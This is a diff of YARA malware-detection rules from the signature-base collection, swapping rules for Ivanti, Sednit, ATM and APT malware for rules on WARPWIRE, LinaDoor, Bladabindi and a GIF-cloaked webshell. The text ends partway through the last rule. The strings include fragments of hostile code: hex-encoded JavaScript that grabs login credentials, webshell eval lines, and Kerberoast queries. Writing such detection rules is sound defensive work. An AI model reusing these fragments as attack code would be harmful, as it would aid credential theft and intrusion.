-		tags = "CVE-2023-35078, FILE"
-		hash1 = "6255c75e2e52d779da39367e7a7d4b8d1b3c9c61321361952dcc05819251a127"
+		tags = "FILE"
 
 	strings:
-		$s1 = "logsPaths.txt" ascii fullword
-		$s2 = "keywords.txtFirefox" ascii
+		$s1 = "/tmp/qactg/" ascii
+		$s2 = "echo '/home/config/dscommands'" ascii
+		$s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
+		$s4 = "ADM20447" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 20KB and all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Logclear_JAVA_Aug23 : CVE_2023_35078 FILE
+rule SIGNATURE_BASE_M_Hunting_Credtheft_WARPWIRE_1 : FILE
 {
 	meta:
-		description = "Detects LogClear.class found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
-		author = "Florian Roth"
-		id = "e1ef3bf3-0107-5ba6-a49f-71e079851a4f"
-		date = "2023-08-01"
-		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L34-L53"
+		description = "This rule detects WARPWIRE, a credential stealer written in JavaScript that is embedded into a legitimate Pulse Secure file."
+		author = "Mandiant"
+		id = "9a6a8783-b531-560d-998d-8aa7c90158a8"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_report_ivanti_mandiant_jan24.yar#L102-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c42c2eca784d7089aab56addca11bad658a4a6c34a81ae823bd0c3dad41a1c99"
-		score = 80
-		quality = 85
-		tags = "CVE-2023-35078, FILE"
-		hash1 = "deb381c25d7a511b9eb936129eeba2c0341cff7f4bd2168b05e40ab2ee89225e"
+		hash = "d0c7a334a4d9dcd3c6335ae13bee59ea"
+		logic_hash = "8029df5998166ab3db3319b0dd765ef3356b4b44dc16d2d418015a0f7ffac97e"
+		score = 75
+		quality = 77
+		tags = "FILE"
 
 	strings:
-		$s1 = "logsPaths.txt" ascii fullword
-		$s2 = "log file: %s, not read" ascii fullword
-		$s3 = "/tmp/.time.tmp" ascii fullword
-		$s4 = "readKeywords" ascii fullword
-		$s5 = "\"----------------  ----------------" ascii fullword
+		$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
+		$s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
+		$s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
+		$s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}
+		$s5 = "Remember the last selected auth realm for 30 days" ascii
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and 4 of them or all of them
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_2 : FILE
+rule SIGNATURE_BASE_MAL_LNX_Linadoor_Rootkit_May22 : FILE
 {
 	meta:
-		description = "Detects malware from Sednit Delphi Downloader report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6ccd2f21-de44-52fb-912e-d3ecbe57e389"
-		date = "2018-04-24"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sednit_delphidownloader.yar#L11-L38"
+		description = "Detects LinaDoor Linux Rootkit"
+		author = "Florian Roth"
+		id = "e2f250b4-9a8a-5d70-83d7-5d12ad3763fb"
+		date = "2022-05-19"
+		modified = "2023-05-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_linadoor_rootkit.yar#L2-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32acbec3405007afce22b0521785439686338d4d3beb02a1d7b9005e49d87221"
-		score = 75
+		logic_hash = "546c34d4c204c7266884bb3b5b6ada418e83029ab88f72e5ffb094f50d9ed28e"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda"
-		hash2 = "657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4"
-		hash3 = "5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182"
-		hash4 = "0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f"
-		hash5 = "72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3"
+		hash1 = "25ff1efe36eb15f8e19411886217d4c9ec30b42dca072b1bf22f041a04049cd9"
+		hash2 = "4792e22d4c9996af1cb58ed54fee921a7a9fdd19f7a5e7f268b6793cdd1ab4e7"
+		hash3 = "9067230a0be61347c0cf5c676580fc4f7c8580fc87c932078ad0c3f425300fb7"
+		hash4 = "940b79dc25d1988dabd643e879d18e5e47e25d0bb61c1f382f9c7a6c545bfcff"
+		hash5 = "a1df5b7e4181c8c1c39de976bbf6601a91cde23134deda25703bc6d9cb499044"
+		hash6 = "c4eea99658cd82d48aaddaec4781ce0c893de42b33376b6c60a949008a3efb27"
+		hash7 = "c5651add0c7db3bbfe0bbffe4eafe9cd5aa254d99be7e3404a2054d6e07d20e7"
 
 	strings:
-		$s1 = "2D444F574E4C4F41445F53544152542D" ascii
-		$s2 = "55504C4F41445F414E445F455845435554455F46494C45" ascii
-		$s3 = "4D6F7A696C6C612076352E31202857696E646F7773204E5420362E313B2072763A362E302E3129204765636B6F2F32303130303130312046697265666F782F36" ascii
-		$s4 = "41646F62654461696C79557064617465" ascii
-		$s5 = "53595354454D494E464F2026205441534B4C495354" ascii
-		$s6 = "6373727376632E657865" ascii
-		$s7 = "536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E" ascii
-		$s8 = "5C536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E" ascii
-		$s9 = "5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E" ascii
-		$s0 = "2D444F574E4C4F41445F53544152542D" ascii
-		$fp1 = "<key name=\"profiles\">"
+		$s1 = "/dev/net/.../rootkit_/" ascii
+		$s2 = "did_exec" ascii fullword
+		$s3 = "rh_reserved_tp_target" ascii fullword
+		$s4 = "HIDDEN_SERVICES" ascii fullword
+		$s5 = "bypass_udp_ports" ascii fullword
+		$s6 = "DoBypassIP" ascii fullword
+		$op1 = { 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 }
+		$op2 = { e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b }
+		$op3 = { 48 89 c3 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 }
+		$op4 = { 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b 41 5c 41 5d }
+		$fp1 = "/wgsyncdaemon.pid"
 
 	condition:
-		filesize < 4000KB and 1 of ( $s* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x457f and filesize < 2000KB and 2 of them and not 1 of ( $fp* ) or 4 of them
 }
-rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_3 : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_A : FILE
 {
 	meta:
-		description = "Detects malware from Sednit Delphi Downloader report"
+		description = "Detects an unspecififed malware - October 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2200fbdc-3600-51d4-a273-dc7fd4127c05"
-		date = "2018-04-24"
-		modified = "2023-01-06"
-		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sednit_delphidownloader.yar#L40-L62"
+		id = "f62ecf7e-2b66-5567-9bf3-3d3797bc582d"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L10-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "20446692842ec9481f34dd976f6b309515c33159653f9988a59335d2f04e4138"
-		score = 75
+		logic_hash = "d71e6640be1b10790d49c084b9ba248e35a6a56dfe9c5a3f219a209024ebec27"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "ecb835d03060db1ea3496ceca2d79d7c4c6c671c9907e0b0e73bf8d3371fa931"
-		hash2 = "e355a327479dcc4e71a38f70450af02411125c5f101ba262e8df99f9f0fef7b6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d112a7e21902287e4a37112bf17d7c73a7b206e7bc81780fd87991c1519f38c8"
 
 	strings:
-		$ = "Processor Level: " fullword ascii
-		$ = "CONNECTION ERROR" fullword ascii
-		$ = "FILE_EXECUTE_AND_KILL_MYSELF" ascii
-		$ = "-KILL_PROCESS-" ascii
-		$ = "-FILE_EXECUTE-" ascii
-		$ = "-DOWNLOAD_ERROR-" ascii
-		$ = "CMD_EXECUTE" fullword ascii
-		$ = "\\Interface\\Office\\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\\" ascii
-		$ = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$x1 = "%s\\system32\\%s.dll" fullword ascii
+		$x2 = "%SystemRoot%\\System32\\svch%s -k nets" fullword ascii
+		$x3 = "\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword ascii
+		$s2 = "boottemp.exe" fullword ascii
+		$s3 = "at \\\\%s %d:%d C:\\%s.exe" fullword ascii
+		$s4 = "cryptcom.dll" fullword ascii
+		$s5 = "Wininet.dll" fullword ascii
+		$s6 = "\\\\%s\\%s\\%s.exe" fullword ascii
+		$s7 = "%s%d.exe" fullword ascii
+		$s8 = "booter.exe" fullword ascii
+		$s9 = "\\\\%s\\pipe%s" fullword ascii
+		$s10 = "C:\\DelInfo.bin" fullword ascii
+		$op0 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
+		$op1 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
+		$op2 = { ee 11 74 cf 73 0b 91 c4 c9 57 b2 d9 36 86 a5 b4 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $x* ) or 3 of ( $s* ) or all of ( $op* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_ATM_Malware_XFSADM_1 : FILE
+rule SIGNATURE_BASE_Sality_Malware_Oct16 : FILE
 {
 	meta:
-		description = "Detects ATM Malware XFSADM"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "7bd7e194-1cf1-5d12-809b-25aaf7f62ca3"
-		date = "2019-06-21"
+		description = "Detects an unspecififed malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7bf2a818-f7ee-587e-b22e-b557251d89e1"
+		date = "2016-10-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_xfsadm.yar#L1-L23"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2c1761407c5e499be43e546badd27428821f828a470fd3e3dcddd08db04aaa5"
-		score = 75
+		logic_hash = "5bf14bbb0a7298a7bc896029c4b92ef9adf24307e4d05dcf86a518b266d1c2a8"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8eaff5e1d4b55dd6e25f007549271da10afd1fa25064d7105de0ca2735487aad"
 
 	strings:
-		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
-		$Code2 = {68 98 01 00 00 50 FF 15}
-		$Mutex = "myXFSADM" wide
-		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" ascii
-		$XFSCommand1 = "WfsExecute" ascii
-		$XFSCommand2 = "WfsGetInfo" ascii
-		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" ascii
-		$WindowName = "XFS ADM" wide
-		$FindWindow = "ADM rec" wide
-		$LogFile = "xfs.log" ascii
-		$TmpFile = "~pipe.tmp" ascii
+		$s1 = "Hello world!" fullword wide
+		$s2 = "[LordPE]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 500KB and ( 4 of them or $PDB )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Tofu_Backdoor
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_C : FILE
 {
 	meta:
-		description = "Detects Tofu Trojan"
-		author = "Cylance"
-		id = "03848366-f139-5352-959d-390992d96296"
-		date = "2017-02-28"
+		description = "Detects an unspecififed malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fff98097-a19a-59aa-bece-837c75b0995c"
+		date = "2016-10-08"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ham_tofu_chches.yar#L11-L24"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "67c49456dbe4dc4c8bc54139ce6d493ea5588392d8c64010d029d7a63ac7f976"
-		score = 75
+		logic_hash = "1f212ef700e77c82954d997beef1157835da38330b583d02df418e10b6c182ee"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a451157f75627b2fef3d663946c94ef7dacb58f08b31d0ec4c0a542a1c4e6205"
 
 	strings:
-		$a = "Cookies: Sym1.0"
-		$b = "\\\\.\\pipe\\1[12345678]"
-		$c = {66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0}
+		$s1 = "dUSER32.DLL" fullword wide
+		$s2 = "output.dll" fullword ascii
 
 	condition:
-		$a or $b or $c
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_RAR_Ntdsdit : FILE
+rule SIGNATURE_BASE_Bladabindi_Malware_B64 : FILE
 {
 	meta:
-		description = "Detects suspicious RAR file that contains ntds.dit or SAM export"
+		description = "Detects Bladabindi Malware using Base64 encoded strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da9e160f-3213-5027-bb0f-bf80ab3d5318"
-		date = "2019-12-16"
-		modified = "2022-11-15"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rar_exfil.yar#L2-L18"
+		id = "7f7023be-b6e1-5e1b-af8a-c413a5438ec8"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L91-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12e527b040e02f573f2a6e0fac4ff99ec441bf189c9bb7e1f763619c079a5bfa"
-		score = 70
+		logic_hash = "081a6361e29fc231f1467b837c51a39b8cccf8caa20844b22d469ce2bbd0c7fb"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dda668b0792b7679979e61f2038cf9a8ec39415cc161be00d2c8301e7d48768d"
 
 	strings:
-		$x1 = "ntds.dit0" ascii fullword
-		$x2 = { 0? 53 41 4D 30 01 00 03 }
-		$x3 = { 0? 73 61 6D 30 01 00 03 }
+		$s1 = "XHN5c3RlbTMyXA==" fullword ascii
+		$s2 = "RXhlY3V0ZSBFUlJPUg==" fullword ascii
+		$s3 = "dHJvamFuLmV4ZQ==" fullword ascii
+		$s4 = "VXBkYXRlIEVSUk9S" fullword ascii
+		$s5 = "RG93bmxvYWQgRVJST1I=" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x21726152 and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-
-rule SIGNATURE_BASE_APT12_Malware_Aug17 : FILE
+rule SIGNATURE_BASE_Dorkbot_Injector_Malware : FILE
 {
 	meta:
-		description = "Detects APT 12 Malware"
+		description = "Detects Darkbot Injector"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c9cd68f-b839-5c99-a9f5-14c2d8a28bec"
-		date = "2017-08-30"
+		id = "b32986fe-d6f1-55f2-8d50-bc348b52fb49"
+		date = "2016-10-08"
 		modified = "2023-12-05"
-		reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt12_malware.yar#L13-L25"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L110-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0766376689540680f8db699f64aa89fc32ddef619a74864eb816c598b8d08c8a"
+		logic_hash = "36138520b0d39dc311b8e9355d1d1c215908a5fe1c01eec76c689f7e74a84303"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
-		hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
+		hash1 = "bc3c5ac7180c8ac21d6908d747aa6122154d2bb51bb99ff0e0b1c65088d275dc"
+
+	strings:
+		$s1 = "Enter an integer, a real number, a character and a string : " fullword ascii
+		$s2 = "ready to finish" fullword ascii
+		$s3 = "EYEnpw" fullword ascii
+		$s4 = "somewhere i belong" fullword ascii
+		$s5 = "Not all fields were assigned" fullword ascii
+		$s6 = "take down" fullword ascii
+		$s7 = "real number = %f" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "9ba915fd04f248ad62e856c7238c0264" )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 6 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_SLOTHFULMEDIA_Oct20_1 : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_D : FILE
 {
 	meta:
-		description = "Detects SLOTHFULMEDIA malware"
+		description = "Detects unspecified malware - October 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc413225-f084-5859-bc27-04eb018d8894"
-		date = "2020-10-01"
+		id = "6908467c-1ed6-508d-9503-246dd26823e5"
+		date = "2016-10-08"
 		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_iamtheking.yar#L2-L48"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L131-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e50bda40eb05767e0903c3d8dd62b4e0290d89740c82c8b7f391d5763dc35156"
+		logic_hash = "78cde422987d2aff64967b86b6cf9279c112a2bfb713a2ea40fe952379d2e326"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273"
-		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
-		hash3 = "f0503f0131040b805e106eafe64a65d9404a0e279f052237b868e456c34d36e6"
-		hash4 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
-		hash5 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
-		hash6 = "cb2adcaaa25bb6b8a9f1c685c219f8d6d78aa5cfd65c633f4d255ff81da2c517"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cd5f3bc0176a6803093ffdea6a7442c416e0d2945b6903063d17f5bb8d17519d"
 
 	strings:
-		$xc1 = { 25 73 26 69 3D 25 64 00 48 54 54 50 2F 31 2E 31
-               00 00 00 00 50 4F 53 54 00 00 00 00 43 6F 6E 74
-               65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 00 00
-               5C 00 53 00 65 00 74 00 75 00 70 00 55 00 69 00
-               00 00 00 00 25 00 73 00 25 00 73 00 5F 00 25 00
-               64 00 2E 00 64 00 61 00 74 }
-		$xc2 = { 2F 76 3F 6D 3D 00 00 00 35 30 31 00 32 30 30 00
-               2A 00 2E 00 2A 00 00 00 25 00 73 00 00 00 00 00
-               53 00 65 00 44 00 65 00 62 00 75 00 67 00 50 00
-               72 00 69 00 76 00 69 00 6C 00 65 00 67 00 65 }
-		$xc3 = { 00 25 00 73 00 7C 00 25 00 73 00 7C 00 25 00 73
-               00 7C 00 25 00 73 00 00 00 5C 00 46 00 69 00 6C
-               00 74 00 65 00 72 00 33 00 2E 00 6A 00 70 00 67 }
-		$sc1 = { 25 74 65 6D 70 25 00 00 25 73 5C 25 73 2E 65 78
-               65 00 00 00 25 74 65 6D 70 25 00 00 25 73 5C 25
-               73 2E 65 78 65 }
-		$sc2 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65
-               74 2D 73 74 72 65 61 6D 2C 61 70 70 6C 69 63 61
-               74 69 6F 6E 2F 78 68 74 6D 6C 00 00 25 73 26 69
-               3D 25 64 00 48 54 54 50 2F 31 2E 31 00 00 00 00
-               50 4F 53 54 }
-		$s1 = "%s%s_%d.dat" wide fullword
-		$s2 = "Local Security Process" wide fullword
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" ascii fullword
-		$s4 = "Global%s%d" wide fullword
-		$s5 = "ExtKeyloggerStart" ascii fullword
-		$s6 = "GetExtendedTcpTable" ascii fullword
+		$s1 = "C:\\file.exe" fullword wide
+		$s2 = "new.exe" fullword wide
+		$s3 = "passwordIterations" fullword ascii
+		$op0 = { 10 00 12 00 1a 00 05 00 01 00 01 00 01 00 10 00 }
+		$op1 = { 41 32 00 36 00 62 00 34 00 32 00 65 00 37 00 62 }
+		$op2 = { 3c 4d 6f 64 75 6c 65 3e 00 6e 65 77 2e 65 78 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Getuserspns_VBS
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_E : FILE
 {
 	meta:
-		description = "Auto-generated rule - file GetUserSPNs.vbs"
+		description = "Detects unspecified Malware - October 2016"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5576c1b9-4670-52c5-b23c-64adcc8709de"
-		date = "2016-05-21"
+		id = "fffffe0c-e114-5648-96ea-dd692610e34c"
+		date = "2016-10-08"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L8-L23"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L152-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ece81cd717fed6ca1f9053384911fd59462b6f3b01210ceeb037ba3da2f7a318"
+		logic_hash = "2040a8cee840560a5aa6065df17206c0313d85b2d11ce482baab05c492360f35"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8dcb568d475fd8a0557e70ca88a262b7c06d0f42835c855b52e059c0f5ce9237"
+		hash1 = "28093385130b61f22920c0ce6e56de1f2cd8eef589bebe2af31f36f51f2b4d01"
 
 	strings:
-		$s1 = "Wscript.Echo \"User Logon: \" & oRecordset.Fields(\"samAccountName\")" fullword ascii
-		$s2 = "Wscript.Echo \" USAGE:        \" & WScript.ScriptName & \" SpnToFind [GC Servername or Forestname]\"" fullword ascii
-		$s3 = "strADOQuery = \"<\" + strGCPath + \">;(&(!objectClass=computer)(servicePrincipalName=*));\" & _" fullword ascii
+		$s1 = "P3pORt" fullword ascii
+		$s2 = "msdownld.tmp" fullword ascii
+		$s3 = "TMP4351$.TMP" fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Getuserspns_PS1
+rule SIGNATURE_BASE_Gifcloaked_Webshell_A : FILE
 {
 	meta:
-		description = "Auto-generated rule - file GetUserSPNs.ps1"
+		description = "Looks like a webshell cloaked as GIF"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2fba75c-264f-5e89-afaf-9d19a4a90784"
-		date = "2016-05-21"
+		id = "4fdef65c-204a-5019-9b4f-c5877c3e39d4"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L25-L41"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/yara_mixed_ext_vars.yar#L180-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "204b009677a02bf8725f928c2bfff321b4543a883760e312a0c92f187684c8e9"
-		score = 75
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		logic_hash = "0c4570373d50c40745cd0523dcf8c34ee3cae1c298982b3a39d4a33e054aa779"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b69206b8d93ac86fe364178011723f4b1544fff7eb1ea544ab8912c436ddc04"
 
 	strings:
-		$s1 = "$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()" fullword ascii
-		$s2 = "@{Name=\"PasswordLastSet\";      Expression={[datetime]::fromFileTime($result.Properties[\"pwdlastset\"][0])} } #, `" fullword ascii
-		$s3 = "Write-Host \"No Global Catalogs Found!\"" fullword ascii
-		$s4 = "$searcher.PropertiesToLoad.Add(\"pwdlastset\") | Out-Null" fullword ascii
+		$s0 = "input type"
+		$s1 = "<%eval request"
+		$s2 = "<%eval(Request.Item["
+		$s3 = "LANGUAGE='VBScript'"
